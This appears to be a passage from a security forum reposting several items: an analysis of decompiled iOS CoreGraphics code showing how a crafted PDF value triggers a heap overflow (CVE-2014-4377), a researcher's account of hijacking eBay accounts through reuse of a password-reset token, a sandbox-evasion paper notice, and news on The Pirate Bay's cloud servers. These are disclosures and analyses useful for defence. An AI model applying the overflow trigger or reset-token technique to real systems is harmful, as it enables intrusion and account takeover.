CGPDFStreamCopyData(lookup_stream); if ( lookup_buffer ) { lookup_size = (N + 1) * CGColorSpaceGetNumberOfComponents(base_cs); if ( CFDataGetLength(lookup_buffer) >= lookup_size ) { data = CFDataGetBytePtr(lookup_buffer); cs = CGColorSpaceCreateIndexed(base_cs, N_, data); } else { /* HERE is te interesting bit. A lookup_size in the [-16,-1] range will silently allocate a very small buffer */ overflow_buffer = x_calloc_2D5143B4(1, lookup_size); _data = CFDataGetBytePtr(lookup_buffer); _size = CFDataGetLength(lookup_buffer); /* But memove will copy all the available data in the stream OVERFLOW!! */ memmove(overflow_buffer, _data, _size); /* CGColorSpaceCreateIndexed is a nop when N is greater than 256 */ cs = CGColorSpaceCreateIndexed(base_cs, N_, overflow_buffer); if ( overflow_buffer ) x_free(overflow_buffer); } CFRelease(lookup_buffer); } goto RELEASEANDEXIT; } /* else if 4th element is a pdf string get it and do stuff ...*/ if ( CGPDFArrayGetString(cs_index_array, 3, &lookup_str) == 1 ) { lookup_size_ = (N + 1) * CGColorSpaceGetNumberOfComponents(base_cs); if ( lookup_size_ != CGPDFStringGetLength(lookup_str) ) { message = "invalid `Indexed' color space: invalid lookup entry."; goto RELEASEANDEXIT; } buffer = CGPDFStringGetBytePtr(lookup_str); cs = CGColorSpaceCreateIndexed(base_cs, N__, buffer); goto RELEASEANDEXIT; } /* at thispoint cs is NULL */ message = "invalid `Indexed' color space: lookup entry is not a stream or a string."; RELEASE_EXIT: CGColorSpaceRelease(base_cs); EXIT: log_2D5A0DA8(message); /* result in cs */ CGPDFArrayGetInteger gets an object from an arbitrary position in a pdf array, starting at 0. The number of indexed colors is read from the third array position (index 2), multiplied by the number of color components of the base colorspace and then (if using pdf stream) allocated with a x_calloc. We basically control the size passed to x_calloc. If the resultant value is for instance -10, x_calloc will allocate a small amount of memory and return a valid pointer. If the innner colorspace is /DeviceRGB with 3 color components, passing a value of 0x55555555 will do the trick. Then the memmove will potentially overflow the small buffer with an arbitrary number of arbitrary bytes. The function CGColorSpaceCreateIndexed can be considered as a no-op as it will use this buffer only if our controlled size is a positive less than 0xff, not the interesting case. Exploitation A 100% reliable PoC exploit can be downloaded from the github project. This exploit needs a companion information leakage vulnerability to bypass ASLR, DEP and Code signing iOS exploit mitigations. The exploit is presented as a cgi script that expects to get the dyld_shared_cache address, the shellcode address and the iOS version as GET parameters. It executes arbitrary code in the context of SafariMobile. Exploit: https://github.com/feliam/CVE-2014-4377 Blog post: Binamuse Blog: CoreGraphics Memory Corruption - CVE-2014-4377 Info: iOS 7_1 exploit for CVE-2014-4377 flaw publicly available | Security Affairs
-
Today I am going to share an interesting finding that allowed me to change the password of almost “150 million” eBay users! I was checking my e-mail when I have found a “View your recent activity” message from PayPal, I have checked the links inside the message and found an “Open Redirection” vulnerability! I have decided to report it to Paypal, I asked a friend of mine about the Paypal security e-mail, he told me that I should register on eBay to report Vulnerabilities to Paypal . Well, I went to eBay to register and have found two other vulnerabilities while registering!, I have reported the three bugs and waited. Two days later, I tried to log in my eBay account to check the status of my 3 reports, and like every time, I have forgotten my password . I went to ” Forget Password” page at eBay to see how secure their password reset mechanism is. So here is how users can change their own passwords on eBay: 1- The user navigate ” Forget password page ” and enter his registered Email or Username. 2- eBay gives you the three options which you can change your password with (Using Email, Text message or phone call). 3- If you use Email method, they will send you an email includes a reset password link where you can change your own password. So lets fire up BurpSuite to see what happens behind the scene.. Visting (https://fyp.ebay.com/EnterUserInfo?&clientapptype=19) and entering my e-mail address will take me to another page that asks me where I want to get my “Reset Password Link” , I have chosen ” By E-mail” and intercepted the request Hijacking eBay users After Forwarding that request, I received an Email with a change password link, I clicked on the link, it takes me to another page where I have to create my new password, I have entered my new password, hit enter and intercepted the request which looked like: Hijacking eBay users Have you noticed that??!! Wow, instead of using the Secret “reqinput value” that have been sent to the user’s email, eBay uses the same “reqinput” value that have been generated in the first request!!! Exploitation Time: I went again to the ” Forget Password page” then entered the victim email, then chose to send the “Reset Password link” to e-mail and captured the request and save the “reqinput value” . then I repeated the POST request “shown in the last screen shot” and replaced the reqinput value with the new one, I posted it, but it gave me error!! Why? because the user have to “click” on the link sent to the email to the server can unlock the change password process ” and this is the only user interaction that has to be taken in order to make the attack succeed” after the user clicked on the “reset password” link, I was able to change his password This means that an attacker can hijack millions of user accounts in a targeted attack Here is a real life attack scenario diagram: eBay hacked Enjoy watching the POC video Sursa: Yasser Ali's Blog » How I could change your eBay password
-
Breaking the Sandbox Author: Sudeep Singh Introduction In this paper, I would like to discuss various existing and interesting techniques which are used to evade the detection of a virus in Sandbox. We will also look at ways a sandbox can be hardened to prevent such evasion techniques. This paper is targeted towards those who have an experience with Windows OS internals, reverse engineering viruses as well as those who are interested in developing detection mechanisms for viruses in a Sandboxed environment. A deep understanding of the evasion techniques used by viruses in the wild helps us in implementing better detection mechanisms. Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/34591.pdf
-
[h=1]The Pirate Bay Runs on 21 "Raid-Proof" Virtual Machines To Avoids Detection[/h] Tuesday, September 23, 2014 Mohit Kumar The Pirate Bay is the world's largest torrent tracker site which handles requests from millions of users everyday and is in the top 100 most visited websites on the Internet. Generally, The Pirate Bay is famous for potentially hosting illegal contents on its website. Despite years of persecution, it continues to disobey copyright laws worldwide. Even both the founders of The Pirate Bay (TPB) file exchange service were arrested by the authorities and are in prison, but their notorious pirated content exchange continues to receive millions of unique visitors daily. That’s really Strange!! But how?? Recently, The Pirate Bay team has revealed how cloud technology made its service’s virtual servers truly secure to avoid police raids and detection. While it doesn't own any physical servers, The Pirate Bay is working on “virtual machines” through a few commercial cloud hosting services, even without knowing that whom they are dealing with. According to TorrentFreak report, at present The Pirate Bay has 21 virtual machines (VMs) that are hosted around the globe at different cloud provider. The cloud technology eliminate the use of any crucial pieces of hardware, thus saved cost, guaranteed better uptime, and made the site more portable, and therefore made the torrent harder to take down. The Pirate Bay operates using 182 GB of RAM and 94 GPU cores, with total storage capacity of 620 GB, which actually are not used in full. Out of 21 VMs, eight of the VMs are used to serve web pages, six are dedicated to handling searches, while two VMs currently runs the site’s database and the remaining five virtual machines are used for load balancing, statistics, the proxy site on port 80, torrent storage and for the controller. Interestingly, the commercial cloud hosting providers have no ideas that The Pirate Bay is using their services, because all traffic goes through the load balancer, which masks the activities of other virtual machines from the cloud providers. This clearly means that none of the IP-addresses of the cloud hosting providers are publicly linked to The Pirate Bay, so that should keep them safe. While, in case of closure of some of these cloud servers by the police, it is always possible to move VMs to another location in a relatively short duration of time. Just like when back in 2006 in Sweden, police raided The Pirate Bay's hosting company, seizing everything from blank CDs to fax machines and servers, taking down the site. But, it took just three days to return in its normal state. Sursa: The Pirate Bay Runs on 21 "Raid-Proof" Virtual Machines To Avoids Detection